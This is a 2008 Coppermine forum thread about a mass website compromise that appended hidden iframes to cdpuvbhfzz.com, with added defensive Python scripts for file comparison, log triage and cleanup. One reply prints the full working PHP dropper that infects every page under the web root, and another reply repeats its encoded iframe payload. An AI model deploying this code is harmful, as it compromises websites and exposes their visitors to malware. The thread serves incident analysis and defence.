Author Topic: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?  (Read 17641 times)
htgguy (Topic starter), Coppermine newbie, Karma: 0, Posts: 3
« on: April 06, 2008, 10:04:11 PM »

I searched and didn't find any reference to this elsewhere on the boards. I just discovered that when I try to access my coppermine gallery in IE7 the page tries to load but hangs up and at the bottom of the window shows that it is trying to redirect to cdpuvbhfzz.com. In Firefox it loads but also says it is contacting this site. I am hosted at 1and1 and have never had any problems like this before. I am not an expert by any means and need to figure out how to correct this or if it presents any threats to visitors of my site. Thanks in advance for any help.

Jim
Nibbler, Dev Team member, Coppermine addict, Karma: 87, Gender: Male, Posts: 16895
« Reply #1 on: April 06, 2008, 10:06:22 PM »

Update your gallery to replace any compromised files.

I wanna be sedated.
htgguy (Topic starter), Coppermine newbie, Karma: 0, Posts: 3
« Reply #2 on: April 06, 2008, 11:20:15 PM »

Thank you for the reply-is there anywhere I can look to find specific instructions on how to do that? Appreciate any help.

Jim
tfischer, Coppermine regular visitor, Karma: 3, Posts: 75
« Reply #3 on: April 06, 2008, 11:50:20 PM »

Quote from: htgguy on April 06, 2008, 11:20:15 PM
Thank you for the reply-is there anywhere I can look to find specific instructions on how to do that? Appreciate any help.

Jim

Sorry your gallery got compromised. Two warnings though: 1) if you don't keep CPG up to date, you risk stuff like this happening, and 2) if you don't search before asking questions, people around here tend to respond harshly.

I'll resist the urge to respond harshly but point you to the Announcements forum where you'll find a sticky thread regarding 1.4.16

Good luck
-Tim
poubao, Contributor, Coppermine frequent poster, Karma: 7, Gender: Male, Posts: 191
« Reply #4 on: April 07, 2008, 12:07:07 AM »

I have the same problem!!!!
Poubao

The incoherence of those who lead us and the incompetence of those who command us are a vibrant tribute to those who carry out the orders.
**Général Patton**
Nibbler, Dev Team member, Coppermine addict, Karma: 87, Gender: Male, Posts: 16895
« Reply #5 on: April 07, 2008, 12:08:45 AM »

Update instructions are in the manual.

scratch, Coppermine newbie, Karma: 0, Posts: 1
« Reply #6 on: April 07, 2008, 03:55:09 AM »

Hi Jim,

I've discovered the same problem with my site this morning.  I upgraded from Coppermine 1.4.12 to 1.4.16, as was suggested on this thread, but that has not resolved the problem.

A quick search on Google seems to suggest that this is a problem that has sprung up over the last few hours, and is affecting a number of websites and bulletin boards. I have contacted my web host, and will wait to see if they have any suggestions.

I'm sorry that your post seems to have been treated fairly dismissively, as though you are a typical newbie who can't be bothered reading the manual.  It would appear your search of the available information on this cdpuvbhfzz.com problem turned up as much as mine did.

Cheers,

David
Moke, Coppermine newbie, Karma: 0, Posts: 1
« Reply #7 on: April 07, 2008, 05:34:36 AM »

Htgguy,

My sites have been hacked too with the same code and I am working my way trying to recover them, but a few things that might help others who find this post as it comes up first in Google.

1. The hack is not specific to Coppermine, it simply updates every .php and .html file with its iframe code.

2. Upgrading to newer versions of software on your website only works if every .php and .html file is replaced.

3. I originally started to manually update the files to remove the code; now I am going through backups to restore the html and php files.

4. I have no idea how the vandal/criminal/loser who did this managed to update the files, but there is no evidence to suggest it was a lack of having the latest release of Coppermine installed.

Terry
sharpo, Coppermine regular visitor, Karma: 1, Gender: Male, Posts: 74
« Reply #8 on: April 07, 2008, 10:30:22 AM »

All my html & php files have been hacked as well. This happened at 17.47 yesterday.

It is not just Coppermine, but phpbb and ordinary web sites that have been affected.

I don't know how this has happened, but it will take ages to sort out with the number of files involved.

Sharpo
Upgraded to 1.4.18 and learning slowly
Joachim Müller, Administrator, Coppermine addict, Karma: 104, Gender: Male, Posts: 38119, aka "GauGau"
« Reply #9 on: April 07, 2008, 02:38:36 PM »

It doesn't make sense to have more reports about possible victims of this attack. What we need to figure out is how the attacker managed to get in - we need to make sure what vulnerability he used to compromise the webspace in the first place.
All who run a heterogeneous (mixed) website with many pre-made apps (like Coppermine, phpBB and a load of other pre-made scripts) are not ideal reporters for their issues, as the infection may be related to any of the pre-made apps.
What we could use is a report from someone who was already running cpg1.4.16 (and only coppermine) on his webspace before the infection happened. If this is the case, you're welcome to come up with a report about the incident. We need additional data for a successful analysis of the attack: what OS, webserver, environment (shared webhosting vs. root server vs. virtual root server vs. dedicated server), PHP version, mysql version etc. you have been running and since when. Extremely helpful would be server log files if you have access to them. A forensic image (complete backup of the entire webspace) and a complete db dump before and after the incident would be helpful as well.
All who qualify at least for the very first aspect (they had only coppermine in version cpg1.4.16 running before they noticed the infection) are welcome to post here.
Meanwhile I suggest the usual counter-actions for all who have fallen victim of the attack: remain calm, make a complete backup of everything (both files as well as a complete database dump), then clean the files, change all your passwords and report the issue to your webhost. It would be advisable as well to report the website your site has been redirected to (cdpuvbhfzz.com) to your webhost.
Googling for the term "cdpuvbhfzz.com" shows reports from various sites (not only related to coppermine, but phpbb, vbulletin, wordpress, Joomla etc.), so it's likely that the attack is not related to coppermine (although we can't tell for sure at this stage).
The internet storm center doesn't seem to be aware of the search term, and I'm not sure what to search for, as we have so far only seen vague reports - none of the above postings on this issue really qualify as valid reports.


Don't contact me over PM or email unless I asked you to. Instead: post on the proper board. All unrequested messages will be ignored and your negative karma will no doubt increase!
Like my avatar? Create a free custom avatar just like mine.
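One concrete way to carry out the "clean the files" step above, and to see why Moke's point 2 holds (an upgrade that only overwrites shipped files leaves dropped files in place), added here as an example that is not part of this thread or of Coppermine: hash every file of the installed tree and compare it with a pristine copy of the same release. The sample trees, the dropped file's name and the list of site-specific paths that are expected to differ are constructed assumptions for the demo.

```python
"""Compare a deployed Coppermine tree with a pristine copy of the same release.
Added example for this thread, not Coppermine code; both trees are constructed
here, and the list of site-specific paths expected to differ is an assumption."""
import hashlib
import os
import tempfile

# Paths that legitimately differ between an install and the release package
# (assumed for the demo): user uploads and the site configuration.
DATA_PREFIXES = ('albums/',)
DATA_FILES = ('include/config.php',)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root):
    """Map every file's path relative to root (with '/' separators) to its digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, '/')
            digests[rel] = sha256_file(path)
    return digests


def is_site_data(rel):
    return rel.startswith(DATA_PREFIXES) or rel in DATA_FILES


def compare_trees(deployed, pristine):
    """Report application files that were modified, added or are missing.
    Site data is skipped for 'modified' and 'added'; a missing shipped file
    is always reported."""
    d, p = hash_tree(deployed), hash_tree(pristine)
    return {
        'modified': sorted(r for r in d if r in p and d[r] != p[r] and not is_site_data(r)),
        'added': sorted(r for r in d if r not in p and not is_site_data(r)),
        'missing': sorted(r for r in p if r not in d),
    }


def write_tree(root, files):
    for rel, data in files.items():
        path = os.path.join(root, *rel.split('/'))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'wb') as fh:
            fh.write(data)


def build_sample_trees():
    """Constructed pair: a release package and an install where one shipped
    file was appended to, one foreign file was dropped into plugins/ and one
    shipped file is gone. Returns (deployed, pristine) directories."""
    release = {
        'index.php': b"<?php /* gallery front page */ ?>\n",
        'thumbnails.php': b"<?php /* album view */ ?>\n",
        'pluginmgr.php': b"<?php /* plugin manager */ ?>\n",
        'plugins/index.html': b"<html></html>\n",
        'include/config.php': b"<?php /* template */ ?>\n",
    }
    install = dict(release)
    install['index.php'] += b"<?php echo '<iframe ...></iframe>'; ?>\n"  # appended payload (abbreviated)
    install['plugins/docs.php'] = b"<?php /* dropped file */ ?>\n"
    install['include/config.php'] = b"<?php /* real site settings */ ?>\n"
    install['albums/userpics/10001/cat.jpg'] = b"\xff\xd8\xff\xe0"
    del install['plugins/index.html']
    pristine = tempfile.mkdtemp(prefix='rel_')
    deployed = tempfile.mkdtemp(prefix='site_')
    write_tree(pristine, release)
    write_tree(deployed, install)
    return deployed, pristine


if __name__ == '__main__':
    deployed, pristine = build_sample_trees()
    for kind, paths in compare_trees(deployed, pristine).items():
        print(kind, paths)
```

Point the two arguments at the live web root and at a freshly unpacked copy of the release actually installed; every entry under "added" with a script extension deserves a look before the upgrade package goes on top, because the upgrade will not remove it.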
poubao, Contributor, Coppermine frequent poster, Karma: 7, Gender: Male, Posts: 191
« Reply #10 on: April 07, 2008, 05:05:18 PM »

Uninstall your plugin "onlinestats"; I resolved my problem with this, and afterwards reinstall all the CPG files and update your gallery.
I think the problem comes from the onlinestats plugin; phpBB and other PHP applications use this kind of mod. (Not sure 100%, but it's what I found to resolve my problem.)
poubao
(you must change all your access passwords)

Joachim Müller, Administrator, Coppermine addict, Karma: 104, Gender: Male, Posts: 38119, aka "GauGau"
« Reply #11 on: April 07, 2008, 05:32:10 PM »

I don't think that onlinestats can be the culprit - please don't issue false alarms without previous discussions. Let's hear the others first who replied to this thread already: did you have onlinestats installed? If yes, what flavor (mod vs. plugin) and what version?

Joachim

htgguy (Topic starter), Coppermine newbie, Karma: 0, Posts: 3
« Reply #12 on: April 08, 2008, 03:19:35 AM »

First, thanks for your help with trying to track this down.

I did not have any add ons installed-just the basic Coppermine 1.4.10 package. I do have a blogger site hosted in this directory as well. I am the only user of this site-no one else has the log in information.

Whatever was done to my site has affected all the pages-there are some html pages in the root that also have the iframe code added to them. It would appear that anything that exists in my directory cannot be trusted at this point. Should I be worried about the hundreds of .jpgs that I have on line? If I must I can re-upload them but if they are safe I would prefer to not have to.

Did I do something that has allowed this to happen? Is there any way for me to determine how someone got into my directory and did the damage they did? I don't know if my host messed up, if I messed up, or if someone just brute forced their way into my webspace. Any advice is appreciated.

Jim
Joachim Müller, Administrator, Coppermine addict, Karma: 104, Gender: Male, Posts: 38119, aka "GauGau"
« Reply #13 on: April 08, 2008, 07:02:22 AM »

cpg1.4.10 is outdated and contains known security flaws that might have led to your server being vulnerable. Clean up everything, then upgrade. Perform an upgrade of your blog app as well.

noellisimo, Coppermine newbie, Karma: -1, Posts: 1
« Reply #14 on: April 08, 2008, 03:15:57 PM »

hey guys,

got the same problem.
the entrance for this hack was "/galerie/thumbnails.php?album=5".

proximate the bummers executed "galerie/update.php" and "/galerie/pluginmgr.php?op=upload" to upload a file ("/galerie/plugins/docs.php").
this file has following source-code (see below) and runs different operations, whereby the chmods are set to 777 for directories and files.
therefore *.htm and *.php can be updated with an iframe-code that calls the "cdpuvbhfzz.com"-shit.

i got no more time (i got a lot of work) to check the "old" files, so i would be glad, if Joachim Müller could check the named files.

greeting from berlin.


Code:
<?php
// Dropper as posted by noellisimo. It walks the whole document root and
// appends an entity-encoded 1x1 iframe to every .php/.html/.htm file it
// can open for writing, then tries to delete itself.
function fileExtension($file) {
    $fileExp = explode('.', $file);
    $filetype = $fileExp[count($fileExp)-1];
    return $filetype;
}

// Handles one directory: returns its sub-directories for the caller and
// appends the payload to every page file in it (except debugger.inc.php).
function parse($path) {
    $dir_array = array();
    if ($handle = opendir($path)) {
        while (false !== ($file = readdir($handle))) {
            if ($file != "." && $file != "..") {
                $try_dir = $path.$file.'/';
                if (is_dir($try_dir)) {
                    array_push($dir_array, $try_dir);
                }
                else {
                    if ($path[strlen($path)-1] != '/') {
                        $path .= '/';
                    }
                    $f_ext = fileExtension($file);
                    if ($f_ext=="php" || $f_ext=="html" || $f_ext=="htm") {
                        if ($file!="debugger.inc.php") {
                            //chmod($path.$file,0777);
                            $fhandle = fopen($path.$file, 'a+');
                            if ($f_ext=="php") {
                                // PHP files get the iframe wrapped in an echo so the page still parses.
                                fwrite($fhandle, "<?php echo '<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>'; ?>\n");
                            }
                            else {
                                // HTML files get the raw iframe; the src is the same URL as numeric character references.
                                fwrite($fhandle, "<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>");
                            }
                            fclose($fhandle);
                        }
                    }
                }
            }
        }
        closedir($handle);
    }
    return $dir_array;
}

// Breadth-first walk starting at DOCUMENT_ROOT; afterwards the script
// unlinks itself and, if that failed, overwrites itself with a harmless-looking stub.
function launch() {
    $total = 0;
    $last = 1;
    $last_num = 0;
    $path = $_SERVER['DOCUMENT_ROOT'];
    $dirs = array();
    array_push($dirs, $path);

    while ($last) {
        $last_num = 0;
        for ($j=$total; $j<$total+$last; $j++) {
            $temp_dirs = parse($dirs[$j]);
            $last_t = sizeof($temp_dirs);
            $last_num += $last_t;
            for ($i=0; $i<$last_t; $i++) {
                array_push($dirs, $temp_dirs[$i]);
            }
        }
        $total += $last;
        $last = $last_num;
    }
    $paths = $_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'];
    unlink($paths);

    if (is_file($paths)) {
        $fhandle = fopen($paths, 'w');
        fwrite($fhandle, "<?php echo'Upload plugins here'?>");
        fclose($fhandle);
    }
}

echo "~!";
launch();
?><?php echo '<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>'?>
snowflow, Coppermine newbie, Karma: 0, Posts: 11
« Reply #15 on: April 08, 2008, 07:52:57 PM »

I had the same problem.
All my files were modified with the iframe at 18:40.

These are my log files:

[06/Apr/2008:18:39:57 +0200] "GET /galerien/update.php HTTP/1.1" 200 32013 "-" "Mozilla/8.0" 83.237.241.116 - -
[06/Apr/2008:18:39:59 +0200] "POST /galerien/pluginmgr.php?op=upload HTTP/1.1" 302 34309 "-" "Mozilla/8.0" 74.6.8.57 - -

Maybe that was the attack?

What do you recommend? I disabled the gallery, then I will update the gallery. What can I also do?

thanks

florian
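The two lines above are enough to write a small triage filter, added here as an example that is not part of snowflow's post or of Coppermine. It parses lines in the field order shown (timestamp, request, status, bytes, referer, user agent, client IP), flags POSTs to pluginmgr.php with op=upload and any request to update.php, and notes when such admin scripts are hit from an address outside a list of known admin IPs. The first two sample lines are snowflow's; the remaining lines and the admin IP 192.0.2.10 are constructed.

```python
"""Triage access-log lines for the update.php / pluginmgr.php?op=upload
sequence seen in this thread. Added example for this thread, not Coppermine
code. The first two lines of SAMPLE_LOG are the ones snowflow posted; the
rest are constructed benign traffic, and the admin IP is an assumption."""
import re
from urllib.parse import parse_qs, urlsplit

# Field order as in the posted lines: timestamp, request, status, bytes,
# referer, user agent, client IP. Hosts that log the IP first need another regex.
LOG_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" (?P<ip>\S+)'
)

# User agent that appears on both posted attack lines; treated as an
# indicator from this thread only, not as a general rule.
SUSPECT_UA = 'Mozilla/8.0'

SAMPLE_LOG = """\
[06/Apr/2008:18:39:57 +0200] "GET /galerien/update.php HTTP/1.1" 200 32013 "-" "Mozilla/8.0" 83.237.241.116 - -
[06/Apr/2008:18:39:59 +0200] "POST /galerien/pluginmgr.php?op=upload HTTP/1.1" 302 34309 "-" "Mozilla/8.0" 74.6.8.57 - -
[06/Apr/2008:18:41:10 +0200] "GET /galerien/index.php HTTP/1.1" 200 18804 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" 192.0.2.10 - -
[06/Apr/2008:18:42:00 +0200] "GET /galerien/pluginmgr.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" 192.0.2.10 - -
"""


def parse_line(line):
    """Dict of named fields, or None for lines that do not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def triage(entry, admin_ips=()):
    """Reasons this request deserves a look; an empty list means nothing notable."""
    parts = urlsplit(entry['target'])
    script = parts.path.rsplit('/', 1)[-1]
    query = parse_qs(parts.query)
    reasons = []
    if script == 'pluginmgr.php' and entry['method'] == 'POST' and query.get('op') == ['upload']:
        reasons.append('plugin upload')
    if script == 'update.php':
        reasons.append('update script run')
    if script in ('pluginmgr.php', 'update.php') and entry['ip'] not in admin_ips:
        reasons.append('admin script from non-admin ip')
    if entry['ua'] == SUSPECT_UA:
        reasons.append('user agent seen in attack lines')
    return reasons


def scan_log(text, admin_ips=()):
    """Return (timestamp, ip, target, reasons) for every line worth a look."""
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = triage(entry, admin_ips)
        if reasons:
            hits.append((entry['ts'], entry['ip'], entry['target'], reasons))
    return hits


if __name__ == '__main__':
    for ts, ip, target, reasons in scan_log(SAMPLE_LOG, admin_ips=('192.0.2.10',)):
        print(ts, ip, target, ', '.join(reasons))
```

On a real log the useful output is the pair of a plugin upload followed within seconds by a hit on update.php, plus every other request those client addresses made around that time.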
sharpo, Coppermine regular visitor, Karma: 1, Gender: Male, Posts: 74
« Reply #16 on: April 08, 2008, 09:13:13 PM »

I also had that plugin/docs file as mentioned by noellisimo

dvdvnr, Coppermine newbie, Karma: 0, Posts: 1
« Reply #17 on: April 08, 2008, 10:44:07 PM »

Additional info found from the hack on our site:

The PHP code (shown in noellisimo's post above) that executed the hack was concealed in a file with a .zip extension and "hidden" in albums/userpics/10001 (where the photos normally live). It WASN'T a zip file - it was a PHP file with a .zip extension. So, if you keep getting hacked then look for this file as well. In our case the file name was 142739_298w3.zip but I suspect it can be called anything.

We've removed Coppermine as it seems that it isn't currently safe to have it around!

David
sharpo, Coppermine regular visitor, Karma: 1, Gender: Male, Posts: 74
« Reply #18 on: April 08, 2008, 10:53:05 PM »

Quote from: dvdvnr on April 08, 2008, 10:44:07 PM
Additional info found from the hack on our site:

The PHP code (shown in noellisimo's post above) that executed the hack was concealed in a file with a .zip extension and "hidden" in albums/userpics/10001 (where the photos normally live). It WASN'T a zip file - it was a PHP file with a .zip extension. So, if you keep getting hacked then look for this file as well. In our case the file name was 142739_298w3.zip but I suspect it can be called anything.

We've removed Coppermine as it seems that it isn't currently safe to have it around!

David

Can't seem to find that, or similar, in any of my albums

mr.goose, Coppermine novice, Karma: 1, Posts: 32
« Reply #19 on: April 08, 2008, 10:54:54 PM »

From my smattering of schoolboy French, it seems similar issues are being reported on the French language forum too.
http://forum.coppermine-gallery.net/index.php/topic,51692.0.html

Sadly so have we. And we're running 1.4.16. Fortunately it seems the damage is limited in our case because we only allow the webserver write-access to a minimal number of files and directories. Meantime I'm downloading our log files and will report again if I find anything that may help the Coppermine Team.

In our case the hack (or whatever it is) also copied a file into our coppermine/albums/userpics/10001 directory. It pretends to be a zip file but it is in fact a php file. I have attached it for analysis. It also attempts to add the following text to the end of any php or html document to which the webserver has write access:

<?php echo '<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>'; ?>


* 142739_298w3.zip (2.41 KB - downloaded 95 times.)
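A defender's counterpart to the dropper in noellisimo's post and to the disguised .zip that dvdvnr and mr.goose describe, added as an example that is not part of this thread or of Coppermine: it walks a web root the way the dropper did, decodes the entity-encoded iframe src so the hostname is readable, flags .zip files that begin with a PHP open tag, and strips the exact payload the dropper appends (repeatedly, in case the script ran more than once). The two payload strings are copied from the posted source; the sample web root is constructed.

```python
"""Find and strip the cdpuvbhfzz.com iframe injector's footprints in a web root.
Added example for this thread, not Coppermine code. The two payload strings are
copied from the docs.php source posted above (the PHP form wraps the same iframe
in an echo and ends with a newline); the sample web root is constructed here."""
import html
import os
import re
import tempfile

IFRAME_HTML = (b'<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;'
               b'&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;'
               b'&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;'
               b'&#46;&#112;&#104;&#112;" width=1 height=1></iframe>')
IFRAME_PHP = b"<?php echo '" + IFRAME_HTML + b"'; ?>\n"

# Looser triage pattern: any 1x1 iframe whose src is written purely as numeric
# character references, which is how this payload hides its hostname.
ENCODED_IFRAME_RE = re.compile(rb'<iframe src="((?:&#\d+;)+)" width=1 height=1></iframe>')


def decode_iframe_src(data):
    """Return the plain URL hidden in an entity-encoded iframe, or None."""
    m = ENCODED_IFRAME_RE.search(data)
    return html.unescape(m.group(1).decode('ascii')) if m else None


def is_php_disguised_as_zip(path):
    """The dropper was stored as a .zip under albums/userpics. A real zip
    starts with 'PK'; the dropper starts with a PHP open tag."""
    if not path.lower().endswith('.zip'):
        return False
    with open(path, 'rb') as fh:
        return fh.read(5).lstrip().startswith(b'<?')


def scan_tree(root):
    """Report suspicious files as sorted (relative path, finding) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, '/')
            ext = name.rsplit('.', 1)[-1].lower()
            if ext in ('php', 'html', 'htm'):
                with open(path, 'rb') as fh:
                    url = decode_iframe_src(fh.read())
                if url:
                    findings.append((rel, 'iframe to ' + url))
            elif is_php_disguised_as_zip(path):
                findings.append((rel, 'php code in .zip'))
    return sorted(findings)


def clean_file(path):
    """Strip the exact known payload from the end of a file, repeatedly in case
    the injector ran more than once. Returns True if the file was changed.
    Anything that is not the exact suffix is left alone for manual review."""
    with open(path, 'rb') as fh:
        data = fh.read()
    original = data
    stripped = True
    while stripped:
        stripped = False
        for payload in (IFRAME_PHP, IFRAME_HTML):
            if data.endswith(payload):
                data = data[:-len(payload)]
                stripped = True
    if data == original:
        return False
    with open(path, 'wb') as fh:
        fh.write(data)
    return True


def clean_tree(root):
    """Clean every php/html/htm file under root; returns the number changed."""
    count = 0
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.rsplit('.', 1)[-1].lower() in ('php', 'html', 'htm'):
                count += clean_file(os.path.join(dirpath, name))
    return count


def build_sample_webroot():
    """Constructed sample tree: two infected pages (one hit twice), one clean
    page, the disguised dropper and a genuine zip."""
    root = tempfile.mkdtemp(prefix='cpg_')
    os.makedirs(os.path.join(root, 'albums', 'userpics', '10001'))
    samples = {
        'index.php': b"<?php echo 'hello'; ?>\n" + IFRAME_PHP + IFRAME_PHP,
        'about.html': b"<html><body>hi</body></html>\n" + IFRAME_HTML,
        'clean.php': b"<?php echo 'ok'; ?>\n",
        'albums/userpics/10001/142739_298w3.zip': b"<?php function launch() {} launch(); ?>",
        'albums/userpics/10001/real.zip': b"PK\x03\x04" + b"\x00" * 26,
    }
    for rel, data in samples.items():
        with open(os.path.join(root, *rel.split('/')), 'wb') as fh:
            fh.write(data)
    return root


if __name__ == '__main__':
    root = build_sample_webroot()
    for rel, finding in scan_tree(root):
        print(rel, '->', finding)
    print('cleaned', clean_tree(root), 'files; remaining:', scan_tree(root))
```

Run scan_tree first and keep its output together with the backup Joachim asks for; clean_tree only removes the byte-exact suffix, so a page the loose pattern flags but the cleaner leaves untouched is one to inspect by hand, and the disguised .zip is never deleted automatically.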